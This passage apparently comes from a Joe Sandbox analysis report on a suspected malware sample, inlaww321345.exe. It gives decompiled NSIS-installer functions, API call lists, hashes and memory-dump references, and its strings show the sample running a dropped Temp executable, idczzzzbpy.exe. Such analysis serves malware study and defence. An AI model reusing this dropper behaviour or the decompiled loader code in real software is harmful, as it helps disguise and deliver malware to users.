			}



















                    0x004062b4
                    0x004062bd
                    0x004062c4
                    0x004062ce
                    0x004062e2
                    0x0040630a
                    0x00406311
                    0x00406315
                    0x00406319
                    0x00406339
                    0x00406340
                    0x0040634a
                    0x00406357
                    0x0040635c
                    0x00406361
                    0x00406365
                    0x00406374
                    0x00406376
                    0x00406383
                    0x00406387
                    0x00406422
                    0x00000000
                    0x0040639d
                    0x004063aa
                    0x004063ce
                    0x004063d2
                    0x004063f1
                    0x004063f5
                    0x004063f5
                    0x004063f7
                    0x00406400
                    0x0040640b
                    0x00406416
                    0x0040641c
                    0x00000000
                    0x0040641c
                    0x004063d4
                    0x004063d7
                    0x004063e2
                    0x004063de
                    0x004063e0
                    0x004063e1
                    0x004063e1
                    0x004063e9
                    0x004063eb
                    0x00000000
                    0x004063eb
                    0x004063b5
                    0x004063bb
                    0x00000000
                    0x004063bb
                    0x00406387
                    0x00406365
                    0x004062e4
                    0x004062ef
                    0x004062f8
                    0x004062fc
                    0x00000000
                    0x00000000
                    0x004062fc
                    0x0040642d

                    APIs
                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040644F,?,?), ref: 004062EF
                    • GetShortPathNameW.KERNEL32 ref: 004062F8
                      • Part of subcall function 004060C3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060D3
                      • Part of subcall function 004060C3: lstrlenA.KERNEL32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406105
                    • GetShortPathNameW.KERNEL32 ref: 00406315
                    • wsprintfA.USER32 ref: 00406333
                    • GetFileSize.KERNEL32(00000000,00000000,007A5E28,C0000000,00000004,007A5E28,?,?,?,?,?), ref: 0040636E
                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040637D
                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063B5
                    • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,007A5228,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040640B
                    • GlobalFree.KERNEL32 ref: 0040641C
                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406423
                      • Part of subcall function 0040615E: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\inlaww321345.exe,80000000,00000003), ref: 00406162
                      • Part of subcall function 0040615E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                    • String ID: %ls=%ls$(Vz$(^z$(^z$[Rename]
                    • API String ID: 2171350718-2000197835
                    • Opcode ID: 88b5ac268f0a1f1c2fdae64f0923303a12147287a2ba527380340a6ee5c0cda9
                    • Instruction ID: 6cadb61bc7003589c9facc341004653e1fa6c0793f9c109ef5d6a16b2289e69d
                    • Opcode Fuzzy Hash: 88b5ac268f0a1f1c2fdae64f0923303a12147287a2ba527380340a6ee5c0cda9
                    • Instruction Fuzzy Hash: 2D313571600705BBD2206B669D48F1B3A9CEF85714F16003EFD42FA2C2DA7DD82586BD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                    Download Yara Rule
                    C-Code - Quality: 90%
                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x7a8ab0;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x7a7aa0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x7a8aa8;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                    0x0040100a
                    0x00401039
                    0x00401047
                    0x0040104d
                    0x00401051
                    0x0040105b
                    0x00401061
                    0x00401064
                    0x004010f3
                    0x00401089
                    0x0040108c
                    0x004010a6
                    0x004010bd
                    0x004010cc
                    0x004010cf
                    0x004010d5
                    0x004010d9
                    0x004010e4
                    0x004010ed
                    0x004010ef
                    0x004010ef
                    0x00401100
                    0x00401105
                    0x0040110d
                    0x00401110
                    0x00401112
                    0x00401118
                    0x0040111f
                    0x00401126
                    0x00401130
                    0x00401142
                    0x00401156
                    0x00401160
                    0x00401165
                    0x00401165
                    0x00401110
                    0x0040116e
                    0x00000000
                    0x00401178
                    0x00401010
                    0x00401013
                    0x00401015
                    0x0040101f
                    0x0040101f
                    0x00000000

                    APIs
                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                    • BeginPaint.USER32(?,?), ref: 00401047
                    • GetClientRect.USER32 ref: 0040105B
                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                    • FillRect.USER32 ref: 004010E4
                    • DeleteObject.GDI32(?), ref: 004010ED
                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                    • SelectObject.GDI32(00000000,?), ref: 00401140
                    • DrawTextW.USER32(00000000,007A7AA0,000000FF,00000010,00000820), ref: 00401156
                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                    • DeleteObject.GDI32(?), ref: 00401165
                    • EndPaint.USER32(?,?), ref: 0040116E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                    • String ID: F
                    • API String ID: 941294808-1304234792
                    • Opcode ID: 6e3369a96ed7e46a89c954ac000689aa30afdbe1f06b793fb73954c758a37c86
                    • Instruction ID: 97a6e5849d711934decb320d9e1447055a7c39d586dd296ee09aa65e352ff849
                    • Opcode Fuzzy Hash: 6e3369a96ed7e46a89c954ac000689aa30afdbe1f06b793fb73954c758a37c86
                    • Instruction Fuzzy Hash: 83418C71800209AFCF058F95CE459AF7BB9FF45315F00802AF991AA1A0CB389A55DFA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004066AB Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 72%
                    			E004066AB(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x7a7a7c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x7a8ad8 + _t44 * 2;
				_t45 = 0x7a6a40;
				_t108 = 0x7a6a40;
				if(_a4 >= 0x7a6a40 && _a4 - 0x7a6a40 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E0040666E(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066AB(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x7a6a40;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x7a9000;
								E0040666E(_t108, (_t78 << 0xb) + 0x7a9000);
							} else {
								E004065B5(_t108,  *0x7a8aa8);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068F5(_t108);
							}
							goto L38;
						}
						if( *0x7a8b24 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x7a8aa4;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x7a8aa8,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x7a8aa8,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E0040653C( *0x7a8ad8, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8ad8 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066AB(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                    0x004066ab
                    0x004066ab
                    0x004066ab
                    0x004066b1
                    0x004066b6
                    0x004066c7
                    0x004066c7
                    0x004066cf
                    0x004066d0
                    0x004066d1
                    0x004066d2
                    0x004066d5
                    0x004066dd
                    0x004066df
                    0x004066f0
                    0x004066f3
                    0x004066f3
                    0x004066f7
                    0x004066fd
                    0x00406700
                    0x004068db
                    0x004068db
                    0x004068e6
                    0x004068f2
                    0x004068f2
                    0x00000000
                    0x00406706
                    0x0040670b
                    0x00406720
                    0x00406721
                    0x00406727
                    0x004068b9
                    0x004068c7
                    0x004068ca
                    0x004068ca
                    0x004068bb
                    0x004068be
                    0x004068c1
                    0x004068c3
                    0x004068c3
                    0x004068cc
                    0x004068cc
                    0x004068d2
                    0x004068d5
                    0x00406708
                    0x00000000
                    0x00406708
                    0x00000000
                    0x004068d5
                    0x0040672d
                    0x00406730
                    0x0040673f
                    0x00406746
                    0x00406752
                    0x00406755
                    0x00406758
                    0x00406759
                    0x0040675e
                    0x00406764
                    0x00406767
                    0x0040676a
                    0x0040685d
                    0x00406862
                    0x00406895
                    0x0040689a
                    0x0040689f
                    0x004068a4
                    0x004068a4
                    0x004068a9
                    0x004068af
                    0x004068b2
                    0x00000000
                    0x004068b2
                    0x00406864
                    0x00406867
                    0x0040686a
                    0x0040687f
                    0x00406886
                    0x0040686c
                    0x00406873
                    0x00406873
                    0x0040688e
                    0x00406891
                    0x00406855
                    0x00406856
                    0x00406856
                    0x00000000
                    0x00406891
                    0x00406777
                    0x0040677b
                    0x0040677b
                    0x0040677c
                    0x0040677e
                    0x004067bb
                    0x004067be
                    0x004067ce
                    0x004067d1
                    0x004067d9
                    0x004067df
                    0x004067df
                    0x0040683a
                    0x0040683a
                    0x0040683c
                    0x00000000
                    0x00000000
                    0x004067e3
                    0x004067e8
                    0x004067e9
                    0x004067eb
                    0x00406802
                    0x00406810
                    0x00406816
                    0x00406818
                    0x00406836
                    0x00406836
                    0x00406836
                    0x00000000
                    0x00406836
                    0x0040681e
                    0x00406827
                    0x0040682a
                    0x00406830
                    0x00406834
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406834
                    0x004067fc
                    0x004067fe
                    0x00406800
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406800
                    0x00000000
                    0x0040683a
                    0x004067c6
                    0x00000000
                    0x00406780
                    0x0040679e
                    0x004067a7
                    0x00406844
                    0x00406848
                    0x00406850
                    0x00406850
                    0x00000000
                    0x00406848
                    0x004067b1
                    0x0040683e
                    0x00406842
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406842
                    0x0040677e
                    0x00000000
                    0x0040670b

                    APIs
                    • GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,00000400), ref: 004067C6
                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,00000400,00000000,007A0F68,?,00405707,007A0F68,00000000,00000000,00000000,00000000), ref: 004067D9
                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,\Microsoft\Internet Explorer\Quick Launch), ref: 00406850
                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: Directory$SystemWindowslstrcatlstrlen
                    • String ID: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                    • API String ID: 4260037668-3252758465
                    • Opcode ID: e97bab54976981856f27dbe6ed1afce439577a8d563873806ee3eb84eabe0ca4
                    • Instruction ID: c9eaf07520507b798c7259a568fd9567d3c8f5a418c476a208567326fda18bee
                    • Opcode Fuzzy Hash: e97bab54976981856f27dbe6ed1afce439577a8d563873806ee3eb84eabe0ca4
                    • Instruction Fuzzy Hash: F061FF72902115AADF10AF68CC40BAE37A5AF55314F22C03FE947B62D0DB3D49A5CB89
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404631 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00404631(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                    0x00404643
                    0x004046f9
                    0x00000000
                    0x004046f9
                    0x00404654
                    0x00404658
                    0x00000000
                    0x00404672
                    0x00404672
                    0x0040467b
                    0x00000000
                    0x00000000
                    0x0040467d
                    0x00404689
                    0x0040468c
                    0x0040468c
                    0x00404692
                    0x00404698
                    0x00404698
                    0x004046a4
                    0x004046aa
                    0x004046b1
                    0x004046b4
                    0x004046b7
                    0x004046b9
                    0x004046b9
                    0x004046c1
                    0x004046c7
                    0x004046c7
                    0x004046d1
                    0x004046d6
                    0x004046d9
                    0x004046de
                    0x004046e1
                    0x004046e1
                    0x004046f1
                    0x004046f1
                    0x00000000
                    0x004046f4

                    APIs
                    • GetWindowLongW.USER32(?,000000EB), ref: 0040464E
                    • GetSysColor.USER32(00000000), ref: 0040468C
                    • SetTextColor.GDI32(?,00000000), ref: 00404698
                    • SetBkMode.GDI32(?,?), ref: 004046A4
                    • GetSysColor.USER32(?), ref: 004046B7
                    • SetBkColor.GDI32(?,?), ref: 004046C7
                    • DeleteObject.GDI32(?), ref: 004046E1
                    • CreateBrushIndirect.GDI32(?), ref: 004046EB
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                    • String ID:
                    • API String ID: 2320649405-0
                    • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                    • Instruction ID: 80d2dfdfbb5be5877469216c844a522b7394a6fa1e0a99176855ee87e7478973
                    • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                    • Instruction Fuzzy Hash: EC2179B15007049BC730DF68D908B5BBBF8AF41714F048E2EE9D6A26E1E739D944DB68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 87%
                    			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x7a8b28 =  *0x7a8b28 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065CE(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040623F( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061E1( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065B5( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
